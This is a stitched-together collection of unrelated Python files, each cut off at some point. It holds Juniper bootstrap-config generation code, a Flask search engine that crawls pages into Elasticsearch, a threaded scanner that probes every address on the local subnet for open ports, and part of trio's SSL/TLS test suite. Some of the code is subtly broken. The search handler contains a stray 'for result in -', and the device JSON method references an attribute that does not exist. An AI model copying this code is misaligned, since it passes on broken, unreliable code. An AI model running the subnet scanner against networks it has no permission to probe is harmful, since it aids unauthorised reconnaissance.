if status:
if vnf_type == c.VNF_TYPE_JUNIPER:
data['device']['ossh_secret'] = data['device']['ossh_secret']
data['device']['ossh_ip'] = c.conf.SERVICES.Ossh.ServiceBindAddress
data['device']['ossh_port'] = c.conf.SERVICES.Ossh.ServiceListenPort
heading = "## Last changed: " + now + "\n"
data['heading'] = heading
status, template = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_TEMPLATE,
serialnumber=None,
deviceOsshId=serialnumber,
path=data['yapt']['bootstrap_template_dir'],
file=data['yapt']['bootstrap_template_file'])
if status:
config = template.render(data, deviceId=serialnumber)
_device_config_file = '{0}-bootstrap-{1}.conf'.format(serialnumber, now)
target = open(grp_cfg.TASKS.Provision.Configuration.ConfigFileHistory + _device_config_file, 'w')
target.write(config)
target.close()
return _device_config_file
else:
self.logger.info(Tools.create_log_msg(logmsg.CONF_DEV_CFG, serialnumber,
logmsg.CONF_DEV_CFG_DEV_DATA_ERROR))
return None
class Software:
def __init__(self):
pass
@classmethod
def get_software_image_name(cls, sample_device, target_version, grp_cfg):
"""
read file names stored under local images directory, extract label and compare them with target images version
- return local filename if we have
- return False if we don't
:param sample_device:
:param target_version:
:param grp_cfg:
:return: filename or False
"""
Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
message=logmsg.SW_CHECK_DIR.format(target_version))
_filename = Path("{0}/{1}.tgz".format(grp_cfg.TASKS.Provision.Software.ImageDir, target_version))
if _filename.is_file():
Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
message=logmsg.SW_IMAGE_OK.format(target_version))
return "{0}.tgz".format(target_version)
else:
Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
message=logmsg.SW_IMAGE_NOK.format(target_version))
return False
#f = False
#for filename in os.listdir(grp_cfg.TASKS.Provision.Software.ImageDir):
# if filename.endswith(".tgz"):
#local_version = re.findall(r"(?:[\d.X]+)(?:\-*)(?:[D\d.]+)", filename)[0]
# local_version = ''.format()
# if target_version == local_version:
# Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
# message=logmsg.SW_IMAGE_OK.format(local_version))
# f = filename
# break
# else:
# pass
#if not f:
# if no file found, return False
# Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
# message=logmsg.SW_IMAGE_NOK.format(target_version))
#return f
@classmethod
def compare_device_vers_with_target_vers(cls, device_version, target_version):
"""
Compare sample_version to target_version
:param device_version: current installed version on device
:param target_version: Target version which should be installed on device
:return: if return == 0 nothing todo since same version;
if return == 1 nothing todo since device installed version newer;
if return == -1 update images since device installed version older;
if compare every digit and they are the same till the end it indicates that they are the same
just of different length
"""
device_version = re.findall(r"(\d+)", device_version)
target_version = re.findall(r"(\d+)", target_version)
if device_version == target_version:
return 0
count = min(len(device_version), len(target_version))
for x in range(count):
if int(device_version[x]) > int(target_version[x]):
return 1
elif int(device_version[x]) < int(target_version[x]):
return -1
return 0
class Vnf(object):
def __init__(self):
self.logger = c.logger
def mkdir_p(self, sftp, remote_directory):
if remote_directory == '/':
sftp.chdir('/')
return
if remote_directory == '':
return
try:
sftp.chdir(remote_directory)
except IOError:
dirname, basename = os.path.split(remote_directory.rstrip('/'))
Vnf.mkdir_p(self, sftp, dirname)
sftp.mkdir(basename)
sftp.chdir(basename)
return True
|
index.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The web server to handle requests from the clients to search queries
and handle requests for crawling new web pages. The server runs on the
python web-server framework called Flask. Incoming client requests are
handled and tasks are added to Redis task queues for processing.
"""
__author__ = "Anthony Sigogne"
__copyright__ = "Copyright 2017, Byprog"
__email__ = "anthony@byprog.com"
__license__ = "MIT"
__version__ = "1.0"
import re
import os
import url
import crawler
import requests
import json
import query
from flask import Flask, request, jsonify
from language import languages
from redis import Redis
from rq import Queue
from multiprocessing import Process
from multiprocessing import Queue as Q
from twisted.internet import reactor
from rq.decorators import job
from scrapy.crawler import CrawlerRunner
from urllib.parse import urlparse
from datetime import datetime
from elasticsearch import Elasticsearch
from flask_rq2 import RQ
import logging
from twisted.internet import reactor
#Initialize the flask application
app = Flask(__name__)
with app.app_context():
from helper import *
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The native Redis library used in the original reference is
outdated and is modified to use the new redis library specific
to Flask apps
Configure and intialize Redis task queue
"""
app.config['RQ_REDIS_URL']='redis://localhost:6379/0'
redis_conn = RQ(app)
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The deprecated elasticsearch library elasticsearch_dsl is
removed and replaced with the new elasticsearch library for
ES clients
Load environment variables and create elastic search DB client
"""
host = os.getenv("HOST")
user = os.getenv("USERNAME")
pwd = os.getenv("PASSWORD")
port = os.getenv("PORT")
es = Elasticsearch(hosts="http://"+user+":"+pwd+"@"+host+":"+port+"/")
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : Logging framework is added to the code to enable better debugging
through logs
Set logging information
"""
logging.basicConfig(filename=datetime.now().strftime('server_%d_%m_%Y.log'),
level=logging.DEBUG,format='%(asctime)s %(levelname)-8s %(message)s')
logging.info(es.info())
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The DB mapping/schema used in the orginal code is specific to
the application the code was used for and needs to be modified
to store information specific to the project experiment
Database schema used to create the DB index if the server is running for
the first time. Ignores the schema if the index already exists.
"""
settings = {
"settings": {
"number_of_shards": 1,
"number_of_replicas": 0
},
"mappings": {
"properties": {
"url": {
"type": "keyword"
},
"domain":{
"type": "keyword"
},
"title":{
"type": "text",
"analyzer": "english"
},
"description":{
"type": "text",
"analyzer": "english"
},
"body":{
"type": "text",
"analyzer": "english"
},
"weight":{
"type": "long"
},
"bert_vector":{
"type": "dense_vector",
"dims": 768
},
"laser_vector":{
"type": "dense_vector",
"dims": 1024
}
}
}
}
es.indices.create(index='web-en',ignore=400,body=settings)
"""
Server endpoint for crawl requests. Crawl requests with list of urls
to crawl is handled by this handler
URL : /explore
Method : HTTP POST
POST Data : url - list of urls to explore
Returns success or error message depending on the task being processed
in the Redis queue.
"""
@app.route("/explore", methods=['POST'])
def explore():
data = dict((key, request.form.get(key)) for key in request.form.keys())
if "url" not in data :
raise InvalidUsage('No url specified in POST data')
logging.info("launch exploration job")
job = explore_job.queue(data["url"])
job.perform()
return "Exploration started"
@redis_conn.job('low')
def explore_job(link) :
"""
Explore a website and index all urls (redis-rq process).
"""
logging.info("explore website at : %s"%link)
try :
link = url.crawl(link).url
except :
return 0
def f(q):
try:
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The original code used CrawlerProcess class from
scrapy library to crawl web pages. However, CrawlerProcess class could
not run parallely in Redis tasks threads. CrawlerProcess was replaced by
CrawlerRunner class that could run parallely in multiple Redis tasks
"""
runner = CrawlerRunner({
'USER_AGENT': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36",
'DOWNLOAD_TIMEOUT':100,
'DOWNLOAD_DELAY':0.25,
'ROBOTSTXT_OBEY':True,
'HTTPCACHE_ENABLED':False,
'REDIRECT_ENABLED':False,
'SPIDER_MIDDLEWARES' : {
'scrapy.downloadermiddlewares.robotstxt.RobotsTxtMiddleware':True,
'scrapy.spidermiddlewares.httperror.HttpErrorMiddleware':True,
'scrapy.downloadermiddlewares.httpcache.HttpCacheMiddleware':True,
'scrapy.extensions.closespider.CloseSpider':True
},
'CLOSESPIDER_PAGECOUNT':500 #only for debug
})
runner.crawl(crawler.Crawler, allowed_domains=[urlparse(link).netloc],
start_urls = [link,], es_client=es, redis_conn=redis_conn)
d = runner.join()
d.addBoth(lambda _: reactor.stop())
reactor.run()
q.put(None)
except Exception as e:
q.put(e)
q = Q()
p = Process(target=f, args=(q,))
p.start()
result = q.get()
p.join()
if result is not None:
raise result
return 1
"""
Server endpoint to handle search queries from the web-client.
Forwards the query to the Elasticsearch DB and return the top
relevant results.
URL : /search
Method : HTTP POST
POST Data : query - The search query
hits - The number of results to be returned
start - Start number for the hits (for pagination purpose)
"""
@app.route("/search", methods=['POST'])
def search():
def format_result(hit, highlight) :
#Highlight title and description
title = hit["title"]
description = hit["description"]
if highlight :
if "description" in highlight :
description = highlight["description"][0]+"..."
elif "body" in highlight :
description = highlight["body"][0]+"..."
#Create false title and description for better user experience
if not title :
title = hit["domain"]
if not description :
description = url.create_description(hit["body"])+"..."
return {
"title":title,
"description":description,
"url":hit["url"],
"thumbnail":hit.get("thumbnail", None)
}
#Analyze and validate the user query
data = dict((key, request.form.get(key)) for key in request.form.keys())
logging.info("[search request data : "+ str(data))
if "query" not in data :
raise InvalidUsage('No query specified in POST data')
start = int(data.get("start", "0"))
hits = int(data.get("hits", "10"))
if start < 0 or hits < 0 :
raise InvalidUsage('Start or hits cannot be negative numbers')
groups = re.search("(site:(?P<domain>[^ ]+))?( ?(?P<query>.*))?",
data["query"]).groupdict()
logging.info("Expression query : " + str(groups["query"]))
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The referenced code included searching web pages
based on their domains as well as search queries. Domain search was irrelevant
to the experiment use case and the code is modified to perform only query search
Send search request to Elastic search DB with the user query
"""
response = es.search(index="web-en",body=query.expression_query(groups["query"]))
logging.info("Raw response" + str(response))
results = []
#Process, sort and return the results back to the user
for domain_bucket in response['aggregations']['per_domain']['buckets']:
for hit in domain_bucket["top_results"]["hits"]["hits"] :
results.append((format_result(hit["_source"],
hit.get("highlight", None)),hit["_score"]))
logging.info("Before Sort Results :" + str(results))
results = [result[0] for result in -
sorted(results, key=lambda result: result[1], reverse=True)]
logging.info("After Sort Results :" + str(results))
total = len(results)
results = results[start:start+hits]
logging.info("Total results : "+ str(total))
return jsonify(total=total, results=results)
|
__init__.py
|
import netifaces
import socket
import time
import threading
def Get_IP():
ips = {"ext": [], "local": []}
for inface in netifaces.interfaces():
try:
ip = netifaces.ifaddresses(inface)[netifaces.AF_INET][0]['addr']
if "127" == ip[:3]:
ips['local'].append(ip)
elif "169" == ip[:3]:
ips['local'].append(ip)
else:
ips['ext'].append(ip)
except:
pass
return ips
def Get_All_IP_Stat():
ips = {"ext": [], "local": []}
for inface in netifaces.interfaces():
try:
ip = netifaces.ifaddresses(inface)[netifaces.AF_INET][0]
ip['mac'] = IP_to_MAC(ip['addr'])
if "127" == ip['addr'][:3]:
ips['local'].append(ip)
elif "169" == ip['addr'][:3]:
ips['local'].append(ip)
else:
ips['ext'].append(ip)
except:
pass
return ips
def Get_IP_with_MAC():
ips = {"ext": [], "local": []}
for inface in netifaces.interfaces():
try:
ip = netifaces.ifaddresses(inface)[netifaces.AF_INET][0]['addr']
if "127" == ip[:3]:
ips['local'].append({"ip": ip, "mac": IP_to_MAC(ip)})
elif "169" == ip[:3]:
ips['local'].append({"ip": ip, "mac": IP_to_MAC(ip)})
else:
ips['ext'].append({"ip": ip, "mac": IP_to_MAC(ip)})
except:
pass
return ips
def IP_to_MAC(ip):
for i in netifaces.interfaces():
addrs = netifaces.ifaddresses(i)
try:
if_mac = addrs[netifaces.AF_LINK][0]['addr']
if_ip = addrs[netifaces.AF_INET][0]['addr']
except:
if_mac = if_ip = None
if if_ip == ip:
return if_mac
return None
def Get_GW():
gateways = netifaces.gateways()
return gateways['default'][netifaces.AF_INET][0]
class Device(object):
def __init__(self, ip):
self.ip = ip
self.Mk_Device = False
self.Mk_Data = {}
self.Mk_Type = False
self.ports = []
self.hostname = None
@property
def rtsp(self):
return 554 in self.ports
@property
def http(self):
return 80 in self.ports
@property
def json(self):
data = {"ip": self.ip, "ports": self.ports, "hostname": self.hostname}
if self.Mk_Device:
data['mk_device'] = self.Mk_Data
return data
class Devices(object):
def __init__(self):
self.All = {}
@property
def json(self):
data = {}
for item in self.All:
data[self.Devices[item].IP] = self.All[item].json
return data
class Port_Scanner(object):
def __init__(self, check_ports):
self.GW = Get_GW()
self.IP = Get_IP()
self.check_ports = check_ports
self.base = ".".join(self.GW.split(".")[:3]) + "."
self.running = 0
self.Devices = Devices()
def Collect(self):
time.sleep(2)
self.Devices = Devices()
self.counted = 0
for port in self.check_ports:
start = 0
for i in range(1, 6):
threading.Thread(target=self.__ripper__, args=[start, i*52, port]).start()
self.running += 1
start += 52
while self.running > 0:
print("[ DDS ] - Device Discovery Scan. Addresses Scanned:", self.counted, end="\r")
time.sleep(0.01)
print("[ DDS ] - Device Discovery Scan. Addresses Scanned:", self.counted)
return self.Devices
def __ripper__(self, start, end, port):
while start <= end:
try:
rmIP = self.base + str(start)
self.counted += 1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.1)
sock.connect((rmIP, port))
time.sleep(0.2)
if rmIP not in self.Devices.All:
device = Device(rmIP)
self.Devices.All[rmIP] = device
#self.Devices.All[rmIP].hostname = hostname TODO Impliment this
self.Devices.All[rmIP].ports.append(port)
except KeyboardInterrupt:
print("[ UKI ] - User Keyboard Interupt")
exit()
except TimeoutError:
pass
except Exception as e:
#print(e)
pass
start += 1
self.running -= 1
|
test_ssl.py
|
import pytest
import threading
import socket as stdlib_socket
import ssl
from contextlib import contextmanager
from functools import partial
from OpenSSL import SSL
import trustme
from async_generator import async_generator, yield_, asynccontextmanager
import trio
from .. import _core
from .._highlevel_socket import SocketStream, SocketListener
from .._highlevel_generic import aclose_forcefully
from .._core import ClosedResourceError, BrokenResourceError
from .._highlevel_open_tcp_stream import open_tcp_stream
from .. import socket as tsocket
from .._ssl import SSLStream, SSLListener, NeedHandshakeError
from .._util import ConflictDetector
from .._core.tests.tutil import slow
from ..testing import (
assert_checkpoints,
Sequencer,
memory_stream_pair,
lockstep_stream_pair,
check_two_way_stream,
)
# We have two different kinds of echo server fixtures we use for testing. The
# first is a real server written using the stdlib ssl module and blocking
# sockets. It runs in a thread and we talk to it over a real socketpair(), to
# validate interoperability in a semi-realistic setting.
#
# The second is a very weird virtual echo server that lives inside a custom
# Stream class. It lives entirely inside the Python object space; there are no
# operating system calls in it at all. No threads, no I/O, nothing. It's
# 'send_all' call takes encrypted data from a client and feeds it directly into
# the server-side TLS state engine to decrypt, then takes that data, feeds it
# back through to get the encrypted response, and returns it from 'receive_some'. This
# gives us full control and reproducibility. This server is written using
# PyOpenSSL, so that we can trigger renegotiations on demand. It also allows
# us to insert random (virtual) delays, to really exercise all the weird paths
# in SSLStream's state engine.
#
# Both present a certificate for "trio-test-1.example.org".
TRIO_TEST_CA = trustme.CA()
TRIO_TEST_1_CERT = TRIO_TEST_CA.issue_server_cert("trio-test-1.example.org")
SERVER_CTX = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
TRIO_TEST_1_CERT.configure_cert(SERVER_CTX)
CLIENT_CTX = ssl.create_default_context()
TRIO_TEST_CA.configure_trust(CLIENT_CTX)
# Temporarily disable TLSv1.3, until the issue with openssl's session
# ticket handling is sorted out one way or another:
# https://github.com/python-trio/trio/issues/819
# https://github.com/openssl/openssl/issues/7948
# https://github.com/openssl/openssl/issues/7967
if hasattr(ssl, "OP_NO_TLSv1_3"):
CLIENT_CTX.options |= ssl.OP_NO_TLSv1_3
# The blocking socket server.
def ssl_echo_serve_sync(sock, *, expect_fail=False):
try:
wrapped = SERVER_CTX.wrap_socket(
sock, server_side=True, suppress_ragged_eofs=False
)
wrapped.do_handshake()
while True:
data = wrapped.recv(4096)
if not data:
# other side has initiated a graceful shutdown; we try to
# respond in kind but it's legal for them to have already gone
# away.
exceptions = (BrokenPipeError, ssl.SSLZeroReturnError)
# Under unclear conditions, CPython sometimes raises
# SSLWantWriteError here. This is a bug (bpo-32219), but it's
# not our bug, so ignore it.
exceptions += (ssl.SSLWantWriteError,)
try:
wrapped.unwrap()
except exceptions:
pass
return
wrapped.sendall(data)
except Exception as exc:
if expect_fail:
print("ssl_echo_serve_sync got error as expected:", exc)
else: # pragma: no cover
print("ssl_echo_serve_sync got unexpected error:", exc)
raise
else:
if expect_fail: # pragma: no cover
raise RuntimeError("failed to fail?")
# Fixture that gives a raw socket connected to a trio-test-1 echo server
# (running in a thread). Useful for testing making connections with different
# SSLContexts.
@asynccontextmanager
@async_generator
async def ssl_echo_server_raw(**kwargs):
a, b = stdlib_socket.socketpair()
async with trio.open_nursery() as nursery:
# Exiting the 'with a, b' context manager closes the sockets, which
# causes the thread to exit (possibly with an error), which allows the
# nursery context manager to exit too.
with a, b:
nursery.start_soon(
trio.to_thread.run_sync,
partial(ssl_echo_serve_sync, b, **kwargs)
)
await yield_(SocketStream(tsocket.from_stdlib_socket(a)))
# Fixture that gives a properly set up SSLStream connected to a trio-test-1
# echo server (running in a thread)
@asynccontextmanager
@async_generator
async def ssl_echo_server(**kwargs):
async with ssl_echo_server_raw(**kwargs) as sock:
await yield_(
SSLStream(
sock, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
)
# The weird in-memory server ... thing.
# Doesn't inherit from Stream because I left out the methods that we don't
# actually need.
class PyOpenSSLEchoStream:
def __init__(self, sleeper=None):
ctx = SSL.Context(SSL.SSLv23_METHOD)
# TLS 1.3 removes renegotiation support. Which is great for them, but
# we still have to support versions before that, and that means we
# need to test renegotation support, which means we need to force this
# to use a lower version where this test server can trigger
# renegotiations. Of course TLS 1.3 support isn't released yet, but
# I'm told that this will work once it is. (And once it is we can
# remove the pragma: no cover too.) Alternatively, once we drop
# support for CPython 3.5 on macOS, then we could switch to using
# TLSv1_2_METHOD.
#
# Discussion: https://github.com/pyca/pyopenssl/issues/624
if hasattr(SSL, "OP_NO_TLSv1_3"):
ctx.set_options(SSL.OP_NO_TLSv1_3)
# Unfortunately there's currently no way to say "use 1.3 or worse", we
# can only disable specific versions. And if the two sides start
# negotiating 1.4 at some point in the future, it *might* mean that
# our tests silently stop working properly. So the next line is a
# tripwire to remind us we need to revisit this stuff in 5 years or
# whatever when the next TLS version is released:
assert not hasattr(SSL, "OP_NO_TLSv1_4")
TRIO_TEST_1_CERT.configure_cert(ctx)
self._conn = SSL.Connection(ctx, None)
self._conn.set_accept_state()
self._lot = _core.ParkingLot()
self._pending_cleartext = bytearray()
self._send_all_conflict_detector = ConflictDetector(
"simultaneous calls to PyOpenSSLEchoStream.send_all"
)
self._receive_some_conflict_detector = ConflictDetector(
"simultaneous calls to PyOpenSSLEchoStream.receive_some"
)
if sleeper is None:
async def no_op_sleeper(_):
return
self.sleeper = no_op_sleeper
else:
self.sleeper = sleeper
async def aclose(self):
self._conn.bio_shutdown()
def renegotiate_pending(self):
return self._conn.renegotiate_pending()
def renegotiate(self):
# Returns false if a renegotation is already in progress, meaning
# nothing happens.
assert self._conn.renegotiate()
async def wait_send_all_might_not_block(self):
with self._send_all_conflict_detector:
await _core.checkpoint()
await _core.checkpoint()
await self.sleeper("wait_send_all_might_not_block")
async def send_all(self, data):
print(" --> transport_stream.send_all")
with self._send_all_conflict_detector:
await _core.checkpoint()
await _core.checkpoint()
await self.sleeper("send_all")
self._conn.bio_write(data)
while True:
await self.sleeper("send_all")
try:
data = self._conn.recv(1)
except SSL.ZeroReturnError:
self._conn.shutdown()
print("renegotiations:", self._conn.total_renegotiations())
break
except SSL.WantReadError:
break
else:
self._pending_cleartext += data
self._lot.unpark_all()
await self.sleeper("send_all")
print(" <-- transport_stream.send_all finished")
async def receive_some(self, nbytes=None):
print(" --> transport_stream.receive_some")
if nbytes is None:
nbytes = 65536 # arbitrary
with self._receive_some_conflict_detector:
try:
await _core.checkpoint()
await _core.checkpoint()
while True:
await self.sleeper("receive_some")
try:
return self._conn.bio_read(nbytes)
except SSL.WantReadError:
# No data in our ciphertext buffer; try to generate
# some.
if self._pending_cleartext:
# We have some cleartext; maybe we can encrypt it
# and then return it.
print(" trying", self._pending_cleartext)
try:
# PyOpenSSL bug: doesn't accept bytearray
# https://github.com/pyca/pyopenssl/issues/621
next_byte = self._pending_cleartext[0:1]
self._conn.send(bytes(next_byte))
# Apparently this next bit never gets hit in the
# test suite, but it's not an interesting omission
# so let's pragma it.
except SSL.WantReadError: # pragma: no cover
# We didn't manage to send the cleartext (and
# in particular we better leave it there to
# try again, due to openssl's retry
# semantics), but it's possible we pushed a
# renegotiation forward and *now* we have data
# to send.
try:
return self._conn.bio_read(nbytes)
except SSL.WantReadError:
# Nope. We're just going to have to wait
# for someone to call send_all() to give
# use more data.
print("parking (a)")
await self._lot.park()
else:
# We successfully sent that byte, so we don't
# have to again.
del self._pending_cleartext[0:1]
else:
# no pending cleartext; nothing to do but wait for
# someone to call send_all
print("parking (b)")
await self._lot.park()
finally:
await self.sleeper("receive_some")
print(" <-- transport_stream.receive_some finished")
async def test_PyOpenSSLEchoStream_gives_resource_busy_errors():
# Make sure that PyOpenSSLEchoStream complains if two tasks call send_all
# at the same time, or ditto for receive_some. The tricky cases where SSLStream
# might accidentally do this are during renegotation, which we test using
# PyOpenSSLEchoStream, so this makes sure that if we do have a bug then
# PyOpenSSLEchoStream will notice and complain.
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.send_all, b"x")
nursery.start_soon(s.send_all, b"x")
assert "simultaneous" in str(excinfo.value)
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.send_all, b"x")
nursery.start_soon(s.wait_send_all_might_not_block)
assert "simultaneous" in str(excinfo.value)
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.wait_send_all_might_not_block)
nursery.start_soon(s.wait_send_all_might_not_block)
assert "simultaneous" in str(excinfo.value)
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.receive_some, 1)
nursery.start_soon(s.receive_some, 1)
assert "simultaneous" in str(excinfo.value)
@contextmanager
def virtual_ssl_echo_server(**kwargs):
fakesock = PyOpenSSLEchoStream(**kwargs)
yield SSLStream(
fakesock, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
def ssl_wrap_pair(
client_transport, server_transport, *, client_kwargs={}, server_kwargs={}
):
client_ssl = SSLStream(
client_transport,
CLIENT_CTX,
server_hostname="trio-test-1.example.org",
**client_kwargs
)
server_ssl = SSLStream(
server_transport, SERVER_CTX, server_side=True, **server_kwargs
)
return client_ssl, server_ssl
def ssl_memory_stream_pair(**kwargs):
client_transport, server_transport = memory_stream_pair()
return ssl_wrap_pair(client_transport, server_transport, **kwargs)
def ssl_lockstep_stream_pair(**kwargs):
client_transport, server_transport = lockstep_stream_pair()
return ssl_wrap_pair(client_transport, server_transport, **kwargs)
# Simple smoke test for handshake/send/receive/shutdown talking to a
# synchronous server, plus make sure that we do the bare minimum of
# certificate checking (even though this is really Python's responsibility)
async def test_ssl_client_basics():
# Everything OK
async with ssl_echo_server() as s:
assert not s.server_side
await s.send_all(b"x")
assert await s.receive_some(1) == b"x"
await s.aclose()
# Didn't configure the CA file, should fail
async with ssl_echo_server_raw(expect_fail=True) as sock:
client_ctx = ssl.create_default_context()
s = SSLStream(
sock, client_ctx, server_hostname="trio-test-1.example.org"
)
assert not s.server_side
with pytest.raises(BrokenResourceError) as excinfo:
await s.send_all(b"x")
assert isinstance(excinfo.value.__cause__, ssl.SSLError)
# Trusted CA, but wrong host name
async with ssl_echo_server_raw(expect_fail=True) as sock:
s = SSLStream(
sock, CLIENT_CTX, server_hostname="trio-test-2.example.org"
)
assert not s.server_side
with pytest.raises(BrokenResourceError) as excinfo:
await s.send_all(b"x")
assert isinstance(excinfo.value.__cause__, ssl.CertificateError)
async def test_ssl_server_basics():
a, b = stdlib_socket.socketpair()
with a, b:
server_sock = tsocket.from_stdlib_socket(b)
server_transport = SSLStream(
SocketStream(server_sock), SERVER_CTX, server_side=True
)
assert server_transport.server_side
def client():
client_sock = CLIENT_CTX.wrap_socket(
a, server_hostname="trio-test-1.example.org"
)
client_sock.sendall(b"x")
assert client_sock.recv(1) == b"y"
client_sock.sendall(b"z")
client_sock.unwrap()
t = threading.Thread(target=client)
t.start()
assert await server_transport.receive_some(1) == b"x"
await server_transport.send_all(b"y")
assert await server_transport.receive_some(1) == b"z"
assert await server_transport.receive_some(1) == b""
await server_transport.aclose()
t.join()
async def test_attributes():
async with ssl_echo_server_raw(expect_fail=True) as sock:
good_ctx = CLIENT_CTX
bad_ctx = ssl.create_default_context()
s = SSLStream(
sock, good_ctx, server_hostname="trio-test-1.example.org"
)
assert s.transport_stream is sock
# Forwarded attribute getting
assert s.context is good_ctx
assert s.server_side == False # noqa
assert s.server_hostname == "trio-test-1.example.org"
with pytest.raises(AttributeError):
s.asfdasdfsa
# __dir__
assert "transport_stream" in dir(s)
assert "context" in dir(s)
# Setting the attribute goes through to the underlying object
# most attributes on SSLObject are read-only
with pytest.raises(AttributeError):
s.server_side = True
with pytest.raises(AttributeError):
s.server_hostname = "asdf"
# but .context is *not*. Check that we forward attribute setting by
# making sure that after we set the bad context our handshake indeed
# fails:
s.context = bad_ctx
assert s.context is bad_ctx
with pytest.raises(BrokenResourceError) as excinfo:
await s.do_handshake()
assert isinstance(excinfo.value.__cause__, ssl.SSLError)
# Note: this test fails horribly if we force TLS 1.2 and trigger a
# renegotiation at the beginning (e.g. by switching to the pyopenssl
# server). Usually the client crashes in SSLObject.write with "UNEXPECTED
# RECORD"; sometimes we get something more exotic like a SyscallError. This is
# odd because openssl isn't doing any syscalls, but so it goes. After lots of
# websearching I'm pretty sure this is due to a bug in OpenSSL, where it just
# can't reliably handle full-duplex communication combined with
# renegotiation. Nice, eh?
#
# https://rt.openssl.org/Ticket/Display.html?id=3712
# https://rt.openssl.org/Ticket/Display.html?id=2481
# http://openssl.6102.n7.nabble.com/TLS-renegotiation-failure-on-receiving-application-data-during-handshake-td48127.html
# https://stackoverflow.com/questions/18728355/ssl-renegotiation-with-full-duplex-socket-communication
#
# In some variants of this test (maybe only against the java server?) I've
# also seen cases where our send_all blocks waiting to write, and then our receive_some
# also blocks waiting to write, and they never wake up again. It looks like
# some kind of deadlock. I suspect there may be an issue where we've filled up
# the send buffers, and the remote side is trying to handle the renegotiation
# from inside a write() call, so it has a problem: there's all this application
# data clogging up the pipe, but it can't process and return it to the
# application because it's in write(), and it doesn't want to buffer infinite
# amounts of data, and... actually I guess those are the only two choices.
#
# NSS even documents that you shouldn't try to do a renegotiation except when
# the connection is idle:
#
# https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/SSL_functions/sslfnc.html#1061582
#
# I begin to see why HTTP/2 forbids renegotiation and TLS 1.3 removes it...
async def test_full_duplex_basics():
CHUNKS = 30
CHUNK_SIZE = 32768
EXPECTED = CHUNKS * CHUNK_SIZE
sent = bytearray()
received = bytearray()
async def sender(s):
nonlocal sent
for i in range(CHUNKS):
print(i)
chunk = bytes([i] * CHUNK_SIZE)
sent += chunk
await s.send_all(chunk)
async def receiver(s):
nonlocal received
while len(received) < EXPECTED:
chunk = await s.receive_some(CHUNK_SIZE // 2)
received += chunk
async with ssl_echo_server() as s:
async with _core.open_nursery() as nursery:
nursery.start_soon(sender, s)
nursery.start_soon(receiver, s)
# And let's have some doing handshakes too, everyone
# simultaneously
nursery.start_soon(s.do_handshake)
nursery.start_soon(s.do_handshake)
await s.aclose()
assert len(sent) == len(received) == EXPECTED
assert sent == received
async def test_renegotiation_simple():
with virtual_ssl_echo_server() as s:
await s.do_handshake()
s.transport_stream.renegotiate()
await s.send_all(b"a")
assert await s.receive_some(1) == b"a"
# Have to send some more data back and forth to make sure the
# renegotiation is finished before shutting down the
# connection... otherwise openssl raises an error. I think this is a
# bug in openssl but what can ya do.
await s.send_all(b"b")
assert await s.receive_some(1) == b"b"
await s.aclose()
@slow
async def test_renegotiation_randomized(mock_clock):
# The only blocking things in this function are our random sleeps, so 0 is
# a good threshold.
mock_clock.autojump_threshold = 0
import random
r = random.Random(0)
async def sleeper(_):
await trio.sleep(r.uniform(0, 10))
async def clear():
while s.transport_stream.renegotiate_pending():
with assert_checkpoints():
await send(b"-")
with assert_checkpoints():
await expect(b"-")
print("-- clear --")
async def send(byte):
await s.transport_stream.sleeper("outer send")
print("calling SSLStream.send_all", byte)
with assert_checkpoints():
await s.send_all(byte)
async def expect(expected):
await s.transport_stream.sleeper("expect")
print("calling SSLStream.receive_some, expecting", expected)
assert len(expected) == 1
with assert_checkpoints():
assert await s.receive_some(1) == expected
with virtual_ssl_echo_server(sleeper=sleeper) as s:
await s.do_handshake()
await send(b"a")
s.transport_stream.renegotiate()
await expect(b"a")
await clear()
for i in range(100):
b1 = bytes([i % 0xff])
b2 = bytes([(2 * i) % 0xff])
s.transport_stream.renegotiate()
async with _core.open_nursery() as nursery:
nursery.start_soon(send, b1)
nursery.start_soon(expect, b1)
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b2)
nursery.start_soon(send, b2)
await clear()
for i in range(100):
b1 = bytes([i % 0xff])
b2 = bytes([(2 * i) % 0xff])
await send(b1)
s.transport_stream.renegotiate()
await expect(b1)
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b2)
nursery.start_soon(send, b2)
await clear()
# Checking that wait_send_all_might_not_block and receive_some don't
# conflict:
# 1) Set up a situation where expect (receive_some) is blocked sending,
# and wait_send_all_might_not_block comes in.
# Our receive_some() call will get stuck when it hits send_all
async def sleeper_with_slow_send_all(method):
if method == "send_all":
await trio.sleep(100000)
# And our wait_send_all_might_not_block call will give it time to get
# stuck, and then start
async def sleep_then_wait_writable():
